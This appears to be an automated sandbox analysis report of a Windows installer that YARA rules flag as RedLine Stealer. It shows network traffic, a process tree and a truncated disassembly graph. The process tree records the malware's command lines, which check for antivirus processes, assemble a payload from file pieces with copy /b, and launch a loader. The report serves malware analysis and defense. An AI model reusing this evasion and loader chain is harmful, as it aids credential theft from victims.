                        Jul 26, 2024 21:22:19.583228111 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:19.621416092 CEST4973712245192.168.2.445.140.147.183

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 26, 2024 21:21:05.251523972 CEST5176453192.168.2.41.1.1.1
                        Jul 26, 2024 21:21:05.261353970 CEST53517641.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 26, 2024 21:21:05.251523972 CEST192.168.2.41.1.1.10x3bStandard query (0)WTYoyXMgGLmyIq.WTYoyXMgGLmyIqA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 26, 2024 21:21:05.261353970 CEST1.1.1.1192.168.2.40x3bName error (3)WTYoyXMgGLmyIq.WTYoyXMgGLmyIqnonenoneA (IP address)IN (0x0001)false

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:15:20:56
                        Start date:26/07/2024
                        Path:C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                        Imagebase:0x400000
                        File size:4'303'615 bytes
                        MD5 hash:37BDC150AF529C0F560F1269DEE8FA17
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:15:20:57
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                        Imagebase:0x400000
                        File size:3'117'568 bytes
                        MD5 hash:6CE04FD06C6A2CADE4A53F1521743144
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:15:20:58
                        Start date:26/07/2024
                        Path:C:\Program Files (x86)\StrLocalGate\Setup.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\StrLocalGate\Setup.exe"
                        Imagebase:0x400000
                        File size:1'750'211 bytes
                        MD5 hash:1C83CFBC97F7BC13E849E9E1AF8E7DA7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:3
                        Start time:15:20:59
                        Start date:26/07/2024
                        Path:C:\StrLocalGate\MmReveals.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\StrLocalGate\MmReveals.exe"
                        Imagebase:0x400000
                        File size:975'909 bytes
                        MD5 hash:5223A85FF161E8818F0E514048051E7D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:4
                        Start time:15:20:59
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe"
                        Imagebase:0x400000
                        File size:3'251'712 bytes
                        MD5 hash:85FE6257CAB9D61BA8C481C64D0026BD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:5
                        Start time:15:21:01
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:15:21:01
                        Start date:26/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\tasklist.exe
                        Wow64 process (32bit):true
                        Commandline:tasklist
                        Imagebase:0xee0000
                        File size:79'360 bytes
                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:8
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\findstr.exe
                        Wow64 process (32bit):true
                        Commandline:findstr /I "wrsa.exe opssvc.exe"
                        Imagebase:0x500000
                        File size:29'696 bytes
                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:9
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\tasklist.exe
                        Wow64 process (32bit):true
                        Commandline:tasklist
                        Imagebase:0x7ff7699e0000
                        File size:79'360 bytes
                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:10
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\findstr.exe
                        Wow64 process (32bit):true
                        Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Imagebase:0x500000
                        File size:29'696 bytes
                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:11
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd /c md 154571
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:12
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\findstr.exe
                        Wow64 process (32bit):true
                        Commandline:findstr /V "TRUEANALOGMINDOC" Pepper
                        Imagebase:0x500000
                        File size:29'696 bytes
                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:13
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd /c copy /b Lt + Blake + Tranny + Category 154571\i
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:14
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\154571\Eco.pif
                        Wow64 process (32bit):true
                        Commandline:154571\Eco.pif 154571\i
                        Imagebase:0x510000
                        File size:937'776 bytes
                        MD5 hash:B06E67F9767E5023892D9698703AD098
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2316981318.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260248187.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259567795.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260441214.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2317320057.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260198982.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260600980.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2257336074.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259650438.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259764346.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:15
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\timeout.exe
                        Wow64 process (32bit):true
                        Commandline:timeout 5
                        Imagebase:0xd90000
                        File size:25'088 bytes
                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:19
                        Start time:15:21:59
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Imagebase:0x40000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:20
                        Start time:15:21:59
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Imagebase:0x310000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:12.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:20.6%
                          Total number of Nodes:1523
                          Total number of Limit Nodes:37
                          execution_graph 4170 402fc0 4171 401446 18 API calls 4170->4171 4172 402fc7 4171->4172 4173 403017 4172->4173 4174 40300a 4172->4174 4177 401a13 4172->4177 4175 406805 18 API calls 4173->4175 4176 401446 18 API calls 4174->4176 4175->4177 4176->4177 4178 4023c1 4179 40145c 18 API calls 4178->4179 4180 4023c8 4179->4180 4183 40726a 4180->4183 4186 406ed2 CreateFileW 4183->4186 4187 406f04 4186->4187 4188 406f1e ReadFile 4186->4188 4189 4062a3 11 API calls 4187->4189 4190 4023d6 4188->4190 4193 406f84 4188->4193 4189->4190 4191 4071e3 CloseHandle 4191->4190 4192 406f9b ReadFile lstrcpynA lstrcmpA 4192->4193 4194 406fe2 SetFilePointer ReadFile 4192->4194 4193->4190 4193->4191 4193->4192 4197 406fdd 4193->4197 4194->4191 4195 4070a8 ReadFile 4194->4195 4196 407138 4195->4196 4196->4195 4196->4197 4198 40715f SetFilePointer GlobalAlloc ReadFile 4196->4198 4197->4191 4199 4071a3 4198->4199 4200 4071bf lstrcpynW GlobalFree 4198->4200 4199->4199 4199->4200 4200->4191 4201 401cc3 4202 40145c 18 API calls 4201->4202 4203 401cca lstrlenW 4202->4203 4204 4030dc 4203->4204 4205 4030e3 4204->4205 4207 405f51 wsprintfW 4204->4207 4207->4205 4222 401c46 4223 40145c 18 API calls 4222->4223 4224 401c4c 4223->4224 4225 4062a3 11 API calls 4224->4225 4226 401c59 4225->4226 4227 406c9b 81 API calls 4226->4227 4228 401c64 4227->4228 4229 403049 4230 401446 18 API calls 4229->4230 4233 403050 4230->4233 4231 406805 18 API calls 4232 401a13 4231->4232 4233->4231 4233->4232 4234 40204a 4235 401446 18 API calls 4234->4235 4236 402051 IsWindow 4235->4236 4237 4018d3 4236->4237 4238 40324c 4239 403277 4238->4239 4240 40325e SetTimer 4238->4240 4241 4032cc 4239->4241 4242 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4239->4242 4240->4239 4242->4241 4243 4048cc 4244 4048f1 4243->4244 4245 4048da 4243->4245 4247 4048ff IsWindowVisible 4244->4247 4251 404916 4244->4251 4246 4048e0 4245->4246 4261 40495a 4245->4261 4248 403daf SendMessageW 4246->4248 4250 40490c 4247->4250 4247->4261 4252 4048ea 4248->4252 4249 404960 CallWindowProcW 4249->4252 4262 40484e SendMessageW 4250->4262 4251->4249 4267 406009 lstrcpynW 4251->4267 4255 404945 4268 405f51 wsprintfW 4255->4268 4257 40494c 4258 40141d 80 API calls 4257->4258 4259 404953 4258->4259 4269 406009 lstrcpynW 4259->4269 4261->4249 4263 404871 GetMessagePos ScreenToClient SendMessageW 4262->4263 4264 4048ab SendMessageW 4262->4264 4265 4048a3 4263->4265 4266 4048a8 4263->4266 4264->4265 4265->4251 4266->4264 4267->4255 4268->4257 4269->4261 4270 4022cc 4271 40145c 18 API calls 4270->4271 4272 4022d3 4271->4272 4273 4062d5 2 API calls 4272->4273 4274 4022d9 4273->4274 4275 4022e8 4274->4275 4279 405f51 wsprintfW 4274->4279 4278 4030e3 4275->4278 4280 405f51 wsprintfW 4275->4280 4279->4275 4280->4278 4281 4050cd 4282 405295 4281->4282 4283 4050ee GetDlgItem GetDlgItem GetDlgItem 4281->4283 4284 4052c6 4282->4284 4285 40529e GetDlgItem CreateThread CloseHandle 4282->4285 4330 403d98 SendMessageW 4283->4330 4287 4052f4 4284->4287 4289 4052e0 ShowWindow ShowWindow 4284->4289 4290 405316 4284->4290 4285->4284 4291 405352 4287->4291 4293 405305 4287->4293 4294 40532b ShowWindow 4287->4294 4288 405162 4301 406805 18 API calls 4288->4301 4335 403d98 SendMessageW 4289->4335 4339 403dca 4290->4339 4291->4290 4296 40535d SendMessageW 4291->4296 4336 403d18 4293->4336 4299 40534b 4294->4299 4300 40533d 4294->4300 4298 40528e 4296->4298 4303 405376 CreatePopupMenu 4296->4303 4302 403d18 SendMessageW 4299->4302 4304 404f72 25 API calls 4300->4304 4305 405181 4301->4305 4302->4291 4306 406805 18 API calls 4303->4306 4304->4299 4307 4062a3 11 API calls 4305->4307 4309 405386 AppendMenuW 4306->4309 4308 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4307->4308 4310 4051f3 4308->4310 4311 4051d7 SendMessageW SendMessageW 4308->4311 4312 405399 GetWindowRect 4309->4312 4313 4053ac 4309->4313 4314 405206 4310->4314 4315 4051f8 SendMessageW 4310->4315 4311->4310 4316 4053b3 TrackPopupMenu 4312->4316 4313->4316 4331 403d3f 4314->4331 4315->4314 4316->4298 4318 4053d1 4316->4318 4320 4053ed SendMessageW 4318->4320 4319 405216 4321 405253 GetDlgItem SendMessageW 4319->4321 4322 40521f ShowWindow 4319->4322 4320->4320 4323 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4320->4323 4321->4298 4326 405276 SendMessageW SendMessageW 4321->4326 4324 405242 4322->4324 4325 405235 ShowWindow 4322->4325 4327 40542f SendMessageW 4323->4327 4334 403d98 SendMessageW 4324->4334 4325->4324 4326->4298 4327->4327 4328 40545a GlobalUnlock SetClipboardData CloseClipboard 4327->4328 4328->4298 4330->4288 4332 406805 18 API calls 4331->4332 4333 403d4a SetDlgItemTextW 4332->4333 4333->4319 4334->4321 4335->4287 4337 403d25 SendMessageW 4336->4337 4338 403d1f 4336->4338 4337->4290 4338->4337 4340 403ddf GetWindowLongW 4339->4340 4350 403e68 4339->4350 4341 403df0 4340->4341 4340->4350 4342 403e02 4341->4342 4343 403dff GetSysColor 4341->4343 4344 403e12 SetBkMode 4342->4344 4345 403e08 SetTextColor 4342->4345 4343->4342 4346 403e30 4344->4346 4347 403e2a GetSysColor 4344->4347 4345->4344 4348 403e41 4346->4348 4349 403e37 SetBkColor 4346->4349 4347->4346 4348->4350 4351 403e54 DeleteObject 4348->4351 4352 403e5b CreateBrushIndirect 4348->4352 4349->4348 4350->4298 4351->4352 4352->4350 4353 4030cf 4354 40145c 18 API calls 4353->4354 4355 4030d6 4354->4355 4357 4030dc 4355->4357 4360 4063ac GlobalAlloc lstrlenW 4355->4360 4358 4030e3 4357->4358 4387 405f51 wsprintfW 4357->4387 4361 4063e2 4360->4361 4362 406434 4360->4362 4363 40640f GetVersionExW 4361->4363 4388 40602b CharUpperW 4361->4388 4362->4357 4363->4362 4364 40643e 4363->4364 4365 406464 LoadLibraryA 4364->4365 4366 40644d 4364->4366 4365->4362 4369 406482 GetProcAddress GetProcAddress GetProcAddress 4365->4369 4366->4362 4368 406585 GlobalFree 4366->4368 4370 40659b LoadLibraryA 4368->4370 4371 4066dd FreeLibrary 4368->4371 4374 4064aa 4369->4374 4377 4065f5 4369->4377 4370->4362 4373 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4370->4373 4371->4362 4372 406651 FreeLibrary 4381 40662a 4372->4381 4373->4377 4375 4064ce FreeLibrary GlobalFree 4374->4375 4374->4377 4383 4064ea 4374->4383 4375->4362 4376 4066ea 4379 4066ef CloseHandle FreeLibrary 4376->4379 4377->4372 4377->4381 4378 4064fc lstrcpyW OpenProcess 4380 40654f CloseHandle CharUpperW lstrcmpW 4378->4380 4378->4383 4382 406704 CloseHandle 4379->4382 4380->4377 4380->4383 4381->4376 4384 406685 lstrcmpW 4381->4384 4385 4066b6 CloseHandle 4381->4385 4386 4066d4 CloseHandle 4381->4386 4382->4379 4383->4368 4383->4378 4383->4380 4384->4381 4384->4382 4385->4381 4386->4371 4387->4358 4388->4361 4389 407752 4393 407344 4389->4393 4390 407c6d 4391 4073c2 GlobalFree 4392 4073cb GlobalAlloc 4391->4392 4392->4390 4392->4393 4393->4390 4393->4391 4393->4392 4393->4393 4394 407443 GlobalAlloc 4393->4394 4395 40743a GlobalFree 4393->4395 4394->4390 4394->4393 4395->4394 4396 401dd3 4397 401446 18 API calls 4396->4397 4398 401dda 4397->4398 4399 401446 18 API calls 4398->4399 4400 4018d3 4399->4400 4408 402e55 4409 40145c 18 API calls 4408->4409 4410 402e63 4409->4410 4411 402e79 4410->4411 4412 40145c 18 API calls 4410->4412 4413 405e30 2 API calls 4411->4413 4412->4411 4414 402e7f 4413->4414 4438 405e50 GetFileAttributesW CreateFileW 4414->4438 4416 402e8c 4417 402f35 4416->4417 4418 402e98 GlobalAlloc 4416->4418 4421 4062a3 11 API calls 4417->4421 4419 402eb1 4418->4419 4420 402f2c CloseHandle 4418->4420 4439 403368 SetFilePointer 4419->4439 4420->4417 4423 402f45 4421->4423 4425 402f50 DeleteFileW 4423->4425 4426 402f63 4423->4426 4424 402eb7 4428 403336 ReadFile 4424->4428 4425->4426 4440 401435 4426->4440 4429 402ec0 GlobalAlloc 4428->4429 4430 402ed0 4429->4430 4431 402f04 WriteFile GlobalFree 4429->4431 4432 40337f 37 API calls 4430->4432 4433 40337f 37 API calls 4431->4433 4437 402edd 4432->4437 4434 402f29 4433->4434 4434->4420 4436 402efb GlobalFree 4436->4431 4437->4436 4438->4416 4439->4424 4441 404f72 25 API calls 4440->4441 4442 401443 4441->4442 4443 401cd5 4444 401446 18 API calls 4443->4444 4445 401cdd 4444->4445 4446 401446 18 API calls 4445->4446 4447 401ce8 4446->4447 4448 40145c 18 API calls 4447->4448 4449 401cf1 4448->4449 4450 401d07 lstrlenW 4449->4450 4451 401d43 4449->4451 4452 401d11 4450->4452 4452->4451 4456 406009 lstrcpynW 4452->4456 4454 401d2c 4454->4451 4455 401d39 lstrlenW 4454->4455 4455->4451 4456->4454 4457 403cd6 4458 403ce1 4457->4458 4459 403ce5 4458->4459 4460 403ce8 GlobalAlloc 4458->4460 4460->4459 4461 402cd7 4462 401446 18 API calls 4461->4462 4465 402c64 4462->4465 4463 402d99 4464 402d17 ReadFile 4464->4465 4465->4461 4465->4463 4465->4464 4466 402dd8 4467 402ddf 4466->4467 4468 4030e3 4466->4468 4469 402de5 FindClose 4467->4469 4469->4468 4470 401d5c 4471 40145c 18 API calls 4470->4471 4472 401d63 4471->4472 4473 40145c 18 API calls 4472->4473 4474 401d6c 4473->4474 4475 401d73 lstrcmpiW 4474->4475 4476 401d86 lstrcmpW 4474->4476 4477 401d79 4475->4477 4476->4477 4478 401c99 4476->4478 4477->4476 4477->4478 4108 407c5f 4109 407344 4108->4109 4110 4073c2 GlobalFree 4109->4110 4111 4073cb GlobalAlloc 4109->4111 4112 407c6d 4109->4112 4113 407443 GlobalAlloc 4109->4113 4114 40743a GlobalFree 4109->4114 4110->4111 4111->4109 4111->4112 4113->4109 4113->4112 4114->4113 4479 404363 4480 404373 4479->4480 4481 40439c 4479->4481 4483 403d3f 19 API calls 4480->4483 4482 403dca 8 API calls 4481->4482 4484 4043a8 4482->4484 4485 404380 SetDlgItemTextW 4483->4485 4485->4481 4486 4027e3 4487 4027e9 4486->4487 4488 4027f2 4487->4488 4489 402836 4487->4489 4502 401553 4488->4502 4490 40145c 18 API calls 4489->4490 4492 40283d 4490->4492 4494 4062a3 11 API calls 4492->4494 4493 4027f9 4495 40145c 18 API calls 4493->4495 4500 401a13 4493->4500 4496 40284d 4494->4496 4497 40280a RegDeleteValueW 4495->4497 4506 40149d RegOpenKeyExW 4496->4506 4498 4062a3 11 API calls 4497->4498 4501 40282a RegCloseKey 4498->4501 4501->4500 4503 401563 4502->4503 4504 40145c 18 API calls 4503->4504 4505 401589 RegOpenKeyExW 4504->4505 4505->4493 4512 401515 4506->4512 4514 4014c9 4506->4514 4507 4014ef RegEnumKeyW 4508 401501 RegCloseKey 4507->4508 4507->4514 4509 4062fc 3 API calls 4508->4509 4511 401511 4509->4511 4510 401526 RegCloseKey 4510->4512 4511->4512 4515 401541 RegDeleteKeyW 4511->4515 4512->4500 4513 40149d 3 API calls 4513->4514 4514->4507 4514->4508 4514->4510 4514->4513 4515->4512 4516 403f64 4517 403f90 4516->4517 4518 403f74 4516->4518 4520 403fc3 4517->4520 4521 403f96 SHGetPathFromIDListW 4517->4521 4527 405c84 GetDlgItemTextW 4518->4527 4523 403fad SendMessageW 4521->4523 4524 403fa6 4521->4524 4522 403f81 SendMessageW 4522->4517 4523->4520 4525 40141d 80 API calls 4524->4525 4525->4523 4527->4522 4528 402ae4 4529 402aeb 4528->4529 4530 4030e3 4528->4530 4531 402af2 CloseHandle 4529->4531 4531->4530 4532 402065 4533 401446 18 API calls 4532->4533 4534 40206d 4533->4534 4535 401446 18 API calls 4534->4535 4536 402076 GetDlgItem 4535->4536 4537 4030dc 4536->4537 4538 4030e3 4537->4538 4540 405f51 wsprintfW 4537->4540 4540->4538 4541 402665 4542 40145c 18 API calls 4541->4542 4543 40266b 4542->4543 4544 40145c 18 API calls 4543->4544 4545 402674 4544->4545 4546 40145c 18 API calls 4545->4546 4547 40267d 4546->4547 4548 4062a3 11 API calls 4547->4548 4549 40268c 4548->4549 4550 4062d5 2 API calls 4549->4550 4551 402695 4550->4551 4552 4026a6 lstrlenW lstrlenW 4551->4552 4553 404f72 25 API calls 4551->4553 4556 4030e3 4551->4556 4554 404f72 25 API calls 4552->4554 4553->4551 4555 4026e8 SHFileOperationW 4554->4555 4555->4551 4555->4556 4564 401c69 4565 40145c 18 API calls 4564->4565 4566 401c70 4565->4566 4567 4062a3 11 API calls 4566->4567 4568 401c80 4567->4568 4569 405ca0 MessageBoxIndirectW 4568->4569 4570 401a13 4569->4570 4578 402f6e 4579 402f72 4578->4579 4580 402fae 4578->4580 4581 4062a3 11 API calls 4579->4581 4582 40145c 18 API calls 4580->4582 4583 402f7d 4581->4583 4588 402f9d 4582->4588 4584 4062a3 11 API calls 4583->4584 4585 402f90 4584->4585 4586 402fa2 4585->4586 4587 402f98 4585->4587 4590 4060e7 9 API calls 4586->4590 4589 403e74 5 API calls 4587->4589 4589->4588 4590->4588 4591 4023f0 4592 402403 4591->4592 4593 4024da 4591->4593 4594 40145c 18 API calls 4592->4594 4595 404f72 25 API calls 4593->4595 4596 40240a 4594->4596 4601 4024f1 4595->4601 4597 40145c 18 API calls 4596->4597 4598 402413 4597->4598 4599 402429 LoadLibraryExW 4598->4599 4600 40241b GetModuleHandleW 4598->4600 4602 40243e 4599->4602 4603 4024ce 4599->4603 4600->4599 4600->4602 4615 406365 GlobalAlloc WideCharToMultiByte 4602->4615 4604 404f72 25 API calls 4603->4604 4604->4593 4606 402449 4607 40248c 4606->4607 4608 40244f 4606->4608 4609 404f72 25 API calls 4607->4609 4611 401435 25 API calls 4608->4611 4613 40245f 4608->4613 4610 402496 4609->4610 4612 4062a3 11 API calls 4610->4612 4611->4613 4612->4613 4613->4601 4614 4024c0 FreeLibrary 4613->4614 4614->4601 4616 406390 GetProcAddress 4615->4616 4617 40639d GlobalFree 4615->4617 4616->4617 4617->4606 4618 402df3 4619 402dfa 4618->4619 4621 4019ec 4618->4621 4620 402e07 FindNextFileW 4619->4620 4620->4621 4622 402e16 4620->4622 4624 406009 lstrcpynW 4622->4624 4624->4621 4625 